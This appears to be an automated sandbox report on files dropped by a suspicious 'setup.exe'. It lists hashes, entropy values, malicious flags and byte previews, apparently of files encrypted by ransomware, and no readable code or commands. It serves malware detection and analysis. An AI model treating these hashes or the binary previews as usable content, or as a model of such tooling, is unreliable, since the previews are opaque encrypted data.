              Preview:/*.ob.b_=5.....7b(..V.30vK....%..=...1.a.V9\X........^.Q|.XD.=u.G)L.[+.g1.Y..............L.=.?.1..c..\)..p..H.?f.8.w.$......5...-.......XX,).k@...........D.Z..U...`.S..V. nK.....D."...#...........zA.c.i.M.`c..\o...d..{M..7f..2..e.=.2...u."...........(..FF.\.........d..yY..;;..0C..][Q.Xb..|.v.$..o..o..3g/.4..K.u...m........[.+....(..si..9S?..1...jK.qB.D.V..nFZ..s.e.)\....".Q.{P..............I`....s.6,..[..i....b.Z..~).......s.....x..62....(..1q..?..".H.<..Q.]...w...8....tI.u&..*.+.T..3Q#2P.A\PH.O...H..Eu.(.^....*....-.z~.y...N.yO.>..sY. ...<I..t.|.6....uh.qI...il^....xVa..............."..6;.......d./.*h..E.!Ma9....b...;..XK...>[...nez..4 ....j..g.w..IR..V.o...Q...d..-.....x..*.g.=.d..e..5....$~.d..X....672...:..Pi.%...}qz..p..k.s]..F.B_o.a..9|e@.XVb.H..a...L.$.$..7O.0C.u...G..A.....e....P.@.*..[N.V.....-.y.N.e.Z..{.Pe$...l*.Og..$......a..)|..h.Z.P.c".Xz..+o..'I.y.\YK.m..>..?}.q=Dz.z..r..DI... ..F..(.$...P/B..@.Y....,1..&....l...He2V&.o...B.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2212
              Entropy (8bit):7.913893848774439
              Encrypted:false
              SSDEEP:48:E/pu6SVYzb4aJzoTTcsqG6dDX2aYLDeXcK1tDvQYUke+9Ml6UD:E/euYaziTc5dYLDOcK1tDoYUkr9G6A
              MD5:05029F73A2948721EC3742EF7CF3119A
              SHA1:B661896D694924F9E0A726E19F968130FCDA80DA
              SHA-256:6D20AAD293F7C59B5C912EBCB6E09D1732AFE3C72D3ACEF61E06E4D987C21655
              SHA-512:00A881F601C1CC577E47CFEFE1AE354AB1195E5ACC4CE1F024B85052EC04CEADC1562650B3CBA66A6E2515D85D96FD028B9CBD50F703424FA5C89B61E87EFC43
              Malicious:false
              Preview:<!doc...N@.R.... ..5J_.@.a..,.8Q..z..>.8....c..].8i.........m..,..A.@uK.....Nq >I.G`....oRL.../#..j.q.)......H.C|.{.(..*..Gh>.0";....mx.....<g.o....u?.<~...|...Y.f.T...~..`.jX...my.\..%.T6~Y..I.|5S..~..`.1).j'..Z%..'..|.dg ...E..;.....+...WAX...H.-...z....6.c...P.(...n...R...M.-Oa..\....M.O4b.e.....9+...+_.C.7..W..B..i.k..B..<...;..QI/..jbS:.......-2....`......].....O.;$...n...C..)..HS..$..F.F..U_p+<.;l.."..1\...,..`.....8....8ro.D8.sv..b-<.. ..c....g.#:...s.*.]^.SZ.?...`..?.[Q.5j......7.$..>...H.M..Nd.&D..3`"..H}.O.M......F..H.M.#].7.~+ 9.U.......!TiW*.c.......<.e.<g..~.....%.4#$..l'..4......&...9...6O...m....fG.-..V"....o.,..^.[<VQvY...9.W#.G..|x.+..b.T.{..H...!......z.l.)..Z..%...Z'._.Z.H...vX>...zt..gJ7.U............;U?`.$2.q0.Ql(.9Iba....P..j.RU.B\....e..ae...D._.D..@$....98.}...\..Da..j.$Hoy....V.n1....pmR..u.G..#...kX..H...9.T..d.....|U.gu#.....,}.V...j...M...<\.~..'.&X.D<5.D....U..H.............~,......F.[......Ez..Y.#.%....+...$....)
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):843227
              Entropy (8bit):6.392099441993267
              Encrypted:false
              SSDEEP:24576:zNxjEZsy+VlmTu/xTC7XVq9zYFQxMjh52kJSe3JEkJT2jucyjfQHe3J1:zzEZsyCH/xTiXs9zYFQxMjh52kJSe3J/
              MD5:3AD672A3DAE21A20515BEE33936141E0
              SHA1:280342CF95A933605A28902B107ACBE38889D2CF
              SHA-256:45B1494B6E43B7307EBB3B10C3A2352DBC4F010230D6DB7DC856C998C9156238
              SHA-512:7534AD47096F0111635B50E5C568F6AD5D355B8D9E013FD97567692B9319A088739F8D9AADD2212A2E98794CAA756D2C5CD41C0D48A3F6AD7BF42F2DFDCA3E7E
              Malicious:false
              Preview:/*! F.\i./...OTp.^1].:...{.........f.?.*.1.....\..x}..s.W........zFg.19.l.#j.{.+. f.u..t....<b..<%.-..LB..~*..Q..5+...W.i.s.....k.*4..&osKO6..E...5=....:Ax........W...tw[..Oim.$...m....3..v.....a..Z$.HK....M.9.G@oZ..yx.^..Z.'Y..FX."c...^..k@1.q.C38.Y....x..EN.A....|..H.U;&....b...........K.o..5YN.!..H....@.._.|.....d....01k1.C.'(h..-..9l.T..>.LOP..}z+(m#?*...?.l.Ll.....-.H..p.a.M;...Z...e....n..M.|..{.7.3~..W..e...rJ..k..u..n...n_..%?U...v.......\.*o.....J..(..U61....b..qG$A.Ph9U.7R|q.........j.....Qp.....67..S.E@..v......l.=..F$...7.=.....vs.c.j.w.}F......]...|.3..Le.4Jj...|.S.....V..`...8v..oP}.._.3.(.......r............0.........n-IXk..O!....r..S.r7~...,....m43. ..&...h7.......}.@h..Ju1.....EQ[W.wI=..@...<........Lo..N.Z..P_..\L..7.R..=.Z8...I.8-.V.... ...m=..e....^.o.6...0..j.6F.!..E.Vhf%..6...%v-.zi X)..=T/{..<...`.T..M.?....<...O>.......N.w......j.=t.~..}h2.ST..l..7w.)I....vF.U.......j_&..e....I.0[...r...$...c.?...z...JtJ.+6+.:..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2088
              Entropy (8bit):7.9072458027212145
              Encrypted:false
              SSDEEP:48:I9MS/CbeYb9XmIL7T7EFyVQjVEZaa8/vVi/T9t5D:cr/CqIXmi7TAZWB9tx
              MD5:8E305C4609C6F3DA904E76DD58ABCCEE
              SHA1:AC11393674E08ED694D45E78F03BB5CA5EB65BA9
              SHA-256:C3A252FDB21037EF2FD3A85EFB5368D1E998627CF81C5D2672EA250E1FCAFB59
              SHA-512:06DA49F19E773C500E9F602F2DA5FEF3C8B1C9EAAED096E2614D7A4F87945FFAC33305B8C621CEE2A9F6FECAE803AED3A8135F87988E84464BB18B87289B1AC8
              Malicious:false
              Preview:/*.ob.d.1......H.)&......L&T.].q..B4.-i.=...wr.......YTl..g..?d.P..\..-.aQ3....A...`QdJ(..y.[..g.B...P..(....K...d.e..NU..B\Q........w...C'..<...."....m.9<..?...u.6t.{Q0..[.j.........fa....a8.....:L.|....Br$..a............7.......r.....B...P...\H...i....U.. /......C.....9....}M~.......Z...>..W.&...EMa.M.\....*....]..L..........X..T.j.&..im.....1.e...D....'.d[...RB...-...H.0JrE...Xuq...lFi.T../z.]..]i.(.{p.vRkw.T...k..e...[.1.T.3....F..M.....5.%...Xi...1PwUo..9...c..A.w....?(.b$ ...l[.BT......J<.....1_.1Pm7....Y.^.U..[..^?W|.|.~.K..Wt0`...J.,.l2..&*.....:7G|F?....d......-......}...?73.G.c.X.^.'..~........C........J...B.x....."&0TN...<CS..(^zruP.o.'.a'...XRmn........=t..b...S. .N..>X..=...1S).@ou.M>.......N.-.z....f..H..L.!...J%....0...rB.m.[f&.5.7.v#../....').5..R.`.m.K...94.+m.!8i5...3.T0..p.F..e.**..#.....zD.Q..>..'_..{.Q...M.......lsu.....g.b.*....ma~&.L1.?..Y.....:.......,..S....(A....$S...I.q.!.....u.....~.^..... ..[..C".r.S.%$..t.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.872406014869385
              Encrypted:false
              SSDEEP:24:n8c16YlPCfBA/fl7sTPpL3yLQp5dSgzwc9wfn2aDcwv+rkLb2TlMZTMWuUikbD:LbnRsLR3yi5dSO9wP2hwv+re2OTMTU5D
              MD5:51AAFB32F53C5967CE37462A324C3FAE
              SHA1:EB85354DD18EC9992C190BAE817E314C5E8472D9
              SHA-256:4B57F82E4B7BA5135F99EE70D7260089A17518CB9437664C8DE6AA426B751123
              SHA-512:B6B65A5517BBC5181B6AF587196F2213E6FCE4CED5D7463B55E8BDC51EE16D7DC1C12905208C20E8E6080C667EFD29ECB7103EAA6096C754083DBBC3D4D6E2A5
              Malicious:false
              Preview:<!docS~.t.|X.+.)f.xB=.)qtG........G..A.T...k.",*x......c..4...V.M....?..9{.h3.....3,.)..Z=....F.{.M.#.c..m$.%Dt.M.|...X...">.6...A..e..."..U..tS...c.0...j.i^..@......F]]..}.8..B*.+1Py[u..=q!...0..H...i*.....!....Xs...F,.Ci...U..,.....d..a8......6...(F.....m.....M.ci.>..].B/.....k[M. .9-...!......1........V\O.9=....)R.9t.?k..../.x..0ig...#.......(...h3......8A.....N.?....Vc...2h.."....n...-.l............>.D.0..s..l&....wds.>U.Z..E.3..........hD=..4F..V. ........a.....Y?U.&rg..l.<....ye.A..f.tx.[m.d..t...g.C...QU.....)k<z.J...i.v.....P`O.]@.e.+..Y....,.3@[..;b..5`.h.......LC..e.a.&.!.<7.>n...c...o..y.b&2.TW.z...q.F...&.X.....z.gN.88.<MI.#.a....!F>....o...t.yb\$.<N.l...p.J...L..4.X....~p"....\.b.N..)7(.9.paz.dV...B.yU......X.*..6.'.FY..M.v...._.o..Q..Q{....>yEa*.A....j.yf.... ...2|.0........}...5O.+......m..Y.|u.........-.EW*.:..I..p....X...<.%..h+.|....t`X.JQ.8gi9.......e.=..u]....Y.S....f..|(.".v......48.[..y........xj.e..*......-Uc."..X(
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):18629
              Entropy (8bit):7.989022256575147
              Encrypted:false
              SSDEEP:384:nRiru1Zt9QhgwXgV3/sXrjj7Egk/L8A/C+fppfE1:nc6Lt90nXgV3Grjfxk/LB/rnE1
              MD5:ADCF0D92DF5FAF1176B4873AB68B269F
              SHA1:E4CE24EF29A5C8555A90B50E823A48BA05FCE126
              SHA-256:24ED53D76266C0488CC7D1D8EDEE433B5B923CC32B04BD6DD5770AB7FAABF713
              SHA-512:0267947CEFCC51FCCDFC44B0687B16DC52C0317B32F7250846F77823AA09C91B42344FF49550EFC0DC4BA6DBCEC3AC459B00960ED22254328F4603BB3CE02FB8
              Malicious:false
              Preview:{. "CI../h.....zN..'...(?y.}...(..../...iA.^..=4.H..ie...{.0.. .fxU..d_#"..C...h..;|f....E$@U'/ud.G*..7D.z...j}...P/......Fos..MYtC` ..kzo[...(....OeN...SM%...;N......1\*V/q=.......".z.....q...~.~.)..v....kg..B.vG._m..K:...3...$Z#..'.E.....^..V]k.)S..s3........hV..n.Q.6]O...n]".#...f1$&.jo.D_..J..\B.{..l.z...6rK_.6.\oOv.....(..7.T9}.U..rS........[">.....$.9.e..Q.5F.~...b.z.b..v..o..M.`.J.p...ZES...U.K.k....PV!..Tf.w.S.-y....._..5.NT7...4%.+6....$...-..W.]3..w.j..3.Q.3..<..&.....r....v5K[.U.1.u.R'...pY.WY...<.!2..6...w.....3........Fe.......,.=n.c......5.....C.....8...x......_..n..`....C7...n..Tj.&.KA..g.@5..^N.~%.`...[...{z....s..y&.~.i..{.D..D[m....>.e.C.5+....B.fE.7.....)s.#.$.W<..&..2.4...>$...M.t.e....75.*....Q3.j..:.1.,O._(../...v.......#8.l .gc.(.."....t$..wD....8fPew.).B...|0...,3.]..kx.Wj...N.5@.4..>......>...W.v..t.vr{...k.i.....1...[..]X..WX.*\_o...?0.v..f....;8l....v.Xtm..z).}Q......D.3 ...Ke-.d...J.h[YN.UF..4....@...w.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):15335
              Entropy (8bit):7.989182888618409
              Encrypted:false
              SSDEEP:384:ox+O1gDPZGZlq/62oc+W8ZGnmJa/bDF1hMRLhfFnwlteYjNECRae27:oAO1glkq/6Bo/feJhtn4jNECRw
              MD5:0A1E671CEE3358EC2AF28DE3DD023B42
              SHA1:97C9930EE2E6DB51183C15CB611D7D509B289D56
              SHA-256:F9CF2E661FECF68D6289402C4FB9254F784685A5B794689B9798B90EE06990C7
              SHA-512:6DBFD6DED1E2E71BEC36E1AF2B85C0D2780CC466CBAC43D223048CF8E68C3DFF93393581C5F2A5A158160D8ED6B149F62902C8AA6771D9BC33E44B0B2C87AECD
              Malicious:false
              Preview:{. "..V.Z...I._KO......R...o...|SF.....Z..f......l.......-,n...o......7...b.8....0...5...*..j... ....D.......8.eNn.;8Q.}Q.<..jz....G..s.c.@?..[..+E._b....D...!..f]YW....l/lS.\.tH..;.&s.R.^...>...0...gk...K..`.z.0....R..2*f5.z.O.......g.\.q,>o.0.&-nT..R.9Pg.......#.c.f"..A..T`.>e{......drt=....v#...(..-...@.........x6F&.{S/..@...C.lg.W....%e'=...i....V...(.l..,...F..g..2...k...........>.<;.m..n%../.?0...>n<M..sB4.L.2.K..Qil.~.......2p2]p......*....Q....V....3...16..(._'.!...X/.4..E.-1.J..O.R....v.?.c..D.7Y..,kf+.q..G/.b.#...2....C.W'dy.Y~1.W..C...8I..8...I@...8:.\.e.........j....`...$..L..c..`cok&.M.I.JPf/Y&..F...9....79.4..u[&.k8]LpL.9.T.....U......a1.oH.).6.m...}...$.7.d...aa..v...=.9T....pST......7....S....u..o..i...Ru......h......4.;...mB.....@).0p9~x.>.%..'=8.T_%W.|j..=.-.%..B...z3...l\.D-...B..e.../.Ib..v.7.....l..+g.~X..*..i'.?....`.w..*..v...$....|Ux....;.`..Q......,..v].6.C)...3..1.0}..2p`...$...Tol7D..F..ON..t..1..d.iK..A.m.J/
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):13524
              Entropy (8bit):7.98369258461268
              Encrypted:false
              SSDEEP:192:0G1CVi/PpqKvgBk7VVycv5WvGi0q08Mlu1Cg86akD672hwaRWSBQUQep5uo+pbP2:+u8ZBR8kMlu1LLn8ezuNpFH+K9YNT
              MD5:E1B5265FE4BF44392C78439643616C15
              SHA1:B0299D6418C790654723DE624971C35420E86740
              SHA-256:46E4B6F3499F998AFA4801162A100149F0A1980FB2C6873C65826657FBF16EAD
              SHA-512:37CE9BC90FB3EE182EE8CB0735E90E3739B73275725027E2B89C42D3DAD340D3E2FC498C04F23237F714FF7675785724BDB1A32D7D68AF4A6A4B3F8F1915C5FD
              Malicious:false
              Preview:{. ".*#_.........w_..&........0W<...1N...gG.,*l.k..s...}...'&....]...A.p.._.$.....o.6......P....Nv..[......#9a."..UD........."v..$.o...wM.sH.`f..i.Gt...m.&BF....3G....m|.[<.....n....9...W.......V..71\.#.o<X..z..o.[...6.....} .............:....t...1{l..pU*...l.T#..>...C...._...S.dj.J7..k....,........Q]..g.....,/..TPd.....;...kin,S..V.%...v....Z*u,....D...^..F.R....m[...%u....A.8. ..%....P......|X.u...T=...l.R.........."...g....!..B....,......y...._.A.`5....l.}.. m.Z..[Ub=...F..,.x...m.E2N..7o.,.{.(c.u]E.^..=.(..|.v...f.z........D1O.......`u......f.....>0...c.0O%-C..!F......?...@.HKin....]....h..K.=.F.M8jFS.Mb.L...$.....B@..s.T..&A..C./...e..|.....o....;.~....x..)..)...G1.....k'.Z`.H._f......L.T_g...J.g.M.x%.. yv.?..Eb..0}f.%j.c..dl...g...h.P...?.!.v..?)0.qg.....X..x.u..zPh....7.v...)6@...d.1M.....5D.w.*...6?....51......Z...X5.....JH>.n...U... H.RcqV....WB-..<...m.&5l..!...&y....;....'.S....S../.(.#.:.....+.'K..B..Z\..;.....[``T.i#
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):14923
              Entropy (8bit):7.98918240503423
              Encrypted:false
              SSDEEP:384:/gE64ooRIzDBvQz+bA4DpKGnZY4/yvOzNI7cNfisfE38nYjEUh:KFoy9vZcKc+Zlq25IIpfq8L4
              MD5:181554EDB2169F818FBCBF760999358B
              SHA1:773F06B138E456E6F4952555C37E2E1F61C05A4D
              SHA-256:F257A190788A4DA7931830F9BABA75E7F8E75BEDDD1C39502E097BDCF9A2B1DC
              SHA-512:7D08F8621A2E1CBD61B4121D200A8D1ECCE281CDAE3C7F5160A5C18171F6419EDBF97D027886BE8055DEABB12A45C37CE0CFFB8E791643A5D6E9F2881417C327
              Malicious:false
              Preview:{. "..?..[s..............=..XG}l.......N!ZLj...[....#...&.H.]\..Or..1..G7O.T.,.yROr...=M2.{.2+..<....x........e..z..L.mB.].y/.|0....T...w....g.d..Q1......bf6. ..@..v.l..n|i.#.]...q.AG)5..z..l.Kp=0.s7jm.r_..S..........c...B.pQ[..J....Y'(;C.@cz..1+".;).z*xx.x./d...a..$&..f..G.............D..k....V.z..._6....V...G...D..q.}.,..]]9..@q.V...........4...E..'l]...03.@.Ds.w5.8K.......q..J$.;..O.u.b.....Tp.k.....m3.ru~J<M..EY...........7.....".#..d8:...\tD.....907.... ..2.g.#...Y.............<.....rv..6TjS.9...v../.`V...2.o....^.Vl.A`/.!r.!..q3....n!(v8...T.R.r...9...<.......8..#;!..vS$;.ce...k.1.....V.v....=....aR7...1.n..b..J..3ERq.......4.#...e.b.}.7e....wB.`D.6.qL..B.......u..g..."w!0..H;..N..e.F.:..e.....s.&...-q.k....D,..eQ...#.^o..V.G2.O.H..Wp..T..I.GGd.T...j....VZ.....-`.Y...@f:..[....~......y....;.4.;$..g....&...rnL....c....6.N...F.L....AOHTk.T!.c...#......|B...-`aov|J.hl.g....S+d.11.=.t...o..O.$l........By\......S...MnJ.^...5.{......i9.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):15903
              Entropy (8bit):7.987226292331898
              Encrypted:false
              SSDEEP:384:UaJSa3Ctu9L1GIZP0QDmjrL36xQsXraIPn2J0cAAdevaV3fnl9Ka:U+Ctu9kuVm/7Verv2xIC5PKa
              MD5:E07E566C805B19119BF044D20304C570
              SHA1:4D98E1EDBD67F8AD8D16BD24127927D898946F3A
              SHA-256:AAF4F690C03C96A75D3848D583BC1FDFF4FC79E9DFDAB01C1D1ED8706787609B
              SHA-512:3089AEFE29DB9E5A8AECDC719935DA0C0A8DE9022E6C39BD4E4AC00B09CB63579ACEDCFE7678833E8277964B7EDA5EA0A4E32BFD623EB9084B664B3FD3C2EE7C
              Malicious:false
              Preview:{. "......<.3b......c.7..).AC6.y....I.....Z..o.F...z9.b..N..w....-.!.PryH...4S&..tg...@.vf-..u'B*..$....>....!......1...M.b.Z......w.".W..s.J.....Vv.........Fa.Po...Y.C^.......H....W6Gz...>!...Q.W......p.......a=...a.-.........V.K._.S.....m...p.......l...Hp.r..`9e..`pTz.t.o~..e..-.......R..b.X....B,......b8K.Y[P...^.........\Z.......:..........N.F.P........M..7R.Zz._.....s._.H!.~C%.......(.<o..\.....b..ws.....>pz..J.(...}...|.......v../.aL..p.NA..g.d.(...+.y.B...U.%6c..l.....X.....tl..*.r.).g.i......c....}M..(.!(7..U..K`9z.6..e.2h..G.r.Q...nZ.g.P?....yx..9...%.[..<.]..Cz.^C.!.....!.Q5.V.B..z......C/..D..j..:.5g..}.AUz)0...e._Y..s.(|<..Pizp..\.k7..+.y....ZeH4.e.Q9.Y..9.F.....&T^..M.W...U..w.y.U9.G......yx.o..J...S.g.TU9.U...@...1.A5.Np.!h.....)......D.T...o.a..y...daDS..,(0..C.'u!m_U..1.j.:.........$4..S...B..!95Py..6q?P1..G..........s@..l..V..A....g+`N...>..t.......F-.\...y...d.m...8*.....[..=.E: .q\(..X%;...{....%..c.W....S.../.i..h.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):15895
              Entropy (8bit):7.988635461119311
              Encrypted:false
              SSDEEP:384:TX8Tq9EJ0xLs5wUm0X/daHHakGyWK4c30hi70v2X:Gq2J0xKwUmo/dAFSWX
              MD5:3461EECF7F12D22BB730CE3F097029A5
              SHA1:95256E26211C358944858A41D79588DCBB9B6671
              SHA-256:58965E2FBBF6B6C583086155F4C82AB26EDAED0E141C24EFA3C010699B112FFC
              SHA-512:5DD0B336667F9E6CA059FB9E84112FF307FE26FB849F1EECBDAB68BD1EB736E31715E13504969D11B99B197504EA14324D2842BC03EB807174B1436FD7B16E62
              Malicious:false
              Preview:{. ".=..K_.X.L.......s..8e...+..(.5.Vk....&.....(._.<..ILGpX-....B..F$....V.1..=.*Z.....+.+\p........g..Q.U..c..|....~...:!.u.9$.y.h...U.|.be........;J.7.sx...x.Rn.t..E.T.|.dp.K].I.lO......g......O.MA`.$.S9...^.r..E.iO...u#.!..w....(.....9.r[t.(.Sk..5..{aQ....k.m...o&#.J.......$q.%......n.G....(!..b.}vQ.....#.b..l..ko.....S..;....y.#...B....).?....d..:.O.3..f..)..KR4...... ..M..^.O~.....b....5*........y.|...5}Z\M|.......J._....fa.n.7.../...Q.r...>MV....lUfj...].Y9.TXlC...e.f.....L....Q1....-7o..7..DI=.._1........{..>.T..5.&...p.. .o.{...2>'.p!vLGw.r...,.H?...c.oJE...\.K..7.B...K@q...l-..G.Pqh.....A}l.6..F.u..Y.......$_C'_......=l`W.U.em..\.S7'`..wo.nF8.$.bT.....;.=.9~{=.....5j....ak...I.S......j...o-..j....5j...J.P.8.J.....RU(..J.&>>.<.p>.*Vd.....9.....`..F..\g.....<..m.C.@..Gn...tr.]1..._.'H2.Af'....p.=..#......f....O...$kPs...i0X..ur......s*....k.,&...%.7....r...j..l...A......n|t.T..]B...).q.].X\gP.z7....4H.)....x!....3.W....]..|.o.y.v+.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):14493
              Entropy (8bit):7.9878718928121595
              Encrypted:false
              SSDEEP:384:2Tp5u/c8tZB2B7ngngEYzmXfF7C4pzTX7wYb6OdjBR6OC:2tDKBangnqqXfF7C4pzTpbtR6OC
              MD5:F6F9B194CF81B8CEC896794F0E533698
              SHA1:3B2AD4F2882139FF99D8F682543121E3D2378FBC
              SHA-256:3E80B60A1C533D883AB7EE30C3F1924F9F0BD5F2D1A5A5B7D40BAD13CAF58793
              SHA-512:EC2A06312A33D5D21F2E63E960BEEE23CBB0B98341D9A097404A9E1D9AA5BBD806CFE1C0B2477FDF285C07B7276BAFE46D1DDB21C5EEBADCF8EB7C677B12C92C
              Malicious:false
              Preview:{. "..@a.~.r`...K.]Lquc..s.H.j.c1..h!..n6..D}....6HK_/......o}.M...).c.....W=Cl...~qh....r_.t2.m...E..h..+...6...4..<.......`..r.w.R...w.t.qs....@..p....okA..9Z-~..n...L....EzfJO.X8..*.ZQT....U...P$a.N.@...7....1..'...2....Jhq".....{.i..f.j......|.Q....mu.s.>...V.G../.#....e..C...m.m....9.}Z}|=Q.....%].K.W..{.G'64.........u._N......)..kDvY2.~..y8d}.#.i..s..b....U@.A.#V,........R\.....[W.'.p.F2\.....H..........'..f.._6.jK.Y...}.4a.....$..f...b..Eu>...1....v-%.Tz..L.h...\..K.wX..^....6.....!P.AX.x...bV......S.l......IE.*.........8p)@......5.8....B!T*..}V.......!{9d.....L...udJ......&....5..2..m...V`.....];.<.q.Z~R.r...x.O 7.FZ...76pM..O".e...3Q...Y....-m...*..|p.%.>..mi.-..T.....*.H.......G.C.'...-.&..M1Y".=..=;j..C.d.J.x|...j.*..Sc.(..f....v...T..(..O._..TR......+s.G..y.vyC......<E...F..^...\...;m.>...kil7..}..D.(....1v=..F.......F.B..X.......Dn.bjA.>..Lt.Y|...0..........eE...M......kNf.M80...lqiMJ....;....<l.^i..t7.(.IW...YE.l+.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):420
              Entropy (8bit):7.409202647571712
              Encrypted:false
              SSDEEP:12:95W+aoBexZWdWMUbxdyUh+1LyUsEsMR2cii9a:94+5pdlUbDyjMbD
              MD5:1A027F08A926B06FB493FFF041A40A37
              SHA1:960AC49AF19B60095F4F8FFB29AD1C0DEE5C10C6
              SHA-256:CEDF3FF03659781D5334760A7C84592F13CE2320FB0719869C8E96A10F6CA6D4
              SHA-512:E057B4F87808D69F9866FC507635A4B0F7930C8295C5F9D91822E8850BFB1C7609D94A3B26A11CFCD072C985C9E32A544975322668F985E7CE94595009966D7A
              Malicious:false
              Preview:# Dis$.m..Y$.._....1B*cD...\k.>.V..s..F\...c?h.d........T.Q..3.nl{.iF).....m.*.+.....>Zd....:s.m....Y..m@..7.5.......{...P.H?,F:...(......!.C.Ah.rr.Z.x....@...a:....h..;..$ a.[.... p.X....r-..I>v3&)..o.S...mZ..._.>...A#L.?......b./)V.&+. ..af..O)7..../.$9........V&.T.}3..!.x.ZW..Gu.."+7..:V1?1S...q...3a.v..._....nw...kW..j.%VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):21010
              Entropy (8bit):7.990884160633971
              Encrypted:true
              SSDEEP:384:nh+uzjWMXXqsFUYW7DpYtNFVM9HYXrg4ROryavId0kazVQI3U6ng9cY8fE0WSPS:nh+uzjxHtaitNiHR4RUyMId9/I3U6w8M
              MD5:7E8E1B13574344F59F0304BE689FA584
              SHA1:7C759840776864EF29E05633561FE6A95AF570A2
              SHA-256:8581A8D1174F4DF9EFD63DBF6A3FF3251A618238C3955CB3E1E0E25AD0E66070
              SHA-512:AE096584F0701DDEA1EFDDAB088F72C488D5E3F6E7BD6348745CECCBFFFF6571826D2DD8507B78779679BF53E4E5D041D37F92299ED887DA74DFBE17005EA075
              Malicious:true
              Preview:{. ...n......y$u.......;`...K.H......6.rE .t..s[..wAUP.<..jf....M...9.F....]#.m5e..^.b.].5T..4[.E$(.8..c%Z+wFd....;...~I......hb.....F.O Z...6.>g.{&...4r..oW5.I...I..\x...h.....Q.4..Z.I..rT.c.^._.GB.}..41..p{.....c..[...V.$..BS.~.Z.n.A....'.6...R..MV.=.*./X2..>..L=.t..J..".\....G...#...OP.<a%.W .i.f.;.7.~..tb...'.....$.w..nXn...5Y..tu...dV.y;...b...^..P<.......=5.+.U.[.a..Ll*9.......-.~.U..+.r..\..`3...T.....'....... 1...S.UF..sn...kl=.j>....0#Q....&...n"..4.FL.w-,...j.!..q..sf..#..9y..+.7qc;..#..h.k.3.,.}9X,K...I.o...Z7).-.]..k.H..B-.P......xfGY......p[.;..........k........ ..0*..v.K2..LSv.~. ....3!..(....$..8V..E..D.A..h...r..wb..l........kz..Kv....72JW.T.G.......+.$8.1.......WN..b.{{.)y.&..U.sd.m..Z....ON(-..%.V....E.....'.....+0p.Q..|..4.......y..1?bKq..{..UEQ=..=.........s.g.....f=..&..`.&......"....=&....].]....Q..Z..T..... ...o.m.x...'&...)...A-.f<.S.[.......c.Gb.....i9...:%"FbP#U.| .'....1.._.~Y^b"....U..v........5..AP>...8
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):148627
              Entropy (8bit):7.998766669491139
              Encrypted:true
              SSDEEP:3072:oa1rJ5xobZLeOfjweYA38XMgPYq4QTf4Ac8EshkE9jLrTAGDw+8H20vTLC:fJM1HwVA3104UEsJvZr8W+T2
              MD5:7E4C083D9FD6ED61C3D2F5AECD11659C
              SHA1:CDD79A5BBE189E31B2BFBE44E1726B25F498073F
              SHA-256:09E516196722F9995CC328CED941A6EB899EAF670D0CA0E0C30077F04C24B061
              SHA-512:5567596E08503D8693C5329510510A26B02C8DEB5F656DEEF31AAE8EF6E214EFCEEB4ECFD3C4ACEA243C109AB142DBFC102904C8E5736FB0ABAB09F3C03425A8
              Malicious:true
              Preview:{. .3n.o..l*.9.j.%.l..l....B)#y....u...KDU..O..N.K%...jy.........5./r.p......6.".,...b.....+.Z.X.>.j.O...h..`..Y[2"...%V.sLHz".9..V..i...,..Rg..F...>...S.\Y........|....V../....H.6...T&q....W...DcX........+...u.c...k..E8IQ...UqZ%.]...g..'..$.89.\.!.O/...f..].b..Ch/.;.@d.......n....B..W2.Lnz...BZ..v3....7..../....N.d7.....;...\.oy.~...O.M..).M......S..c^e......#.r..-......F.9...1R......>I.[.!.4.J|"Ny..,GD.u.$....V.2r.....?.........0X .S.....L.7..NH|I"..15.....}_...DU....r.U..\.....?r8..ml.C{...t......J....].89-...\1"r...R...\..O..h....5..E..x.8cm.Ec.w..&.N.b.Q...... .....^....S...%...z>........QY...J8..X.12...V.. .A..;..K.p.L..V\.B7.T..'....fC..V.B`...f.r...l.+.2.0.r& .w$<.].r-....+y..L....jo.~7.-.....G.}..~...!......O.c|.`.N.p..(...o%:.[|.V\jL.u".!../..1~Kl...v%.`T.tB8.20... R>.D(.}.5.C~k..e@...$Vd..m...S&!..0a..g..|y.A...?.._.(..c].3..C...u.wl...f\.....V.Y.k.5...e%'.......x.v...m^.R\........t+.....>.J..i.X.)..-..o.|T..s.n.5.V.v+.6..X....]...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):511701
              Entropy (8bit):6.017542194003564
              Encrypted:false
              SSDEEP:6144:vUqEYBm3vijqiCGSo8zlumWH3+klkfzTOJHYUbHG+FZ8QTHNGs5AeCU:vU+FqihSDzY6bfoGQ8+eeT
              MD5:DD882E2A720E7179E15DE2950A5A08CB
              SHA1:3A641B56CDB2B71289876F5709A73F178A47A57C
              SHA-256:1EEBBAE7AB4DF85FE2DF85F36CFB3DE85CF6650E79ECF06E256DB0724FAB5EC4
              SHA-512:AE3AE32D0A0C00E3237FC90108A632D4B623833BCEFA37FF8979DA5753CC2973C868A9D844B573A7E2E916BEF90EEEE68D4196A3DC7B9B41B1898D0B82354BB2
              Malicious:false
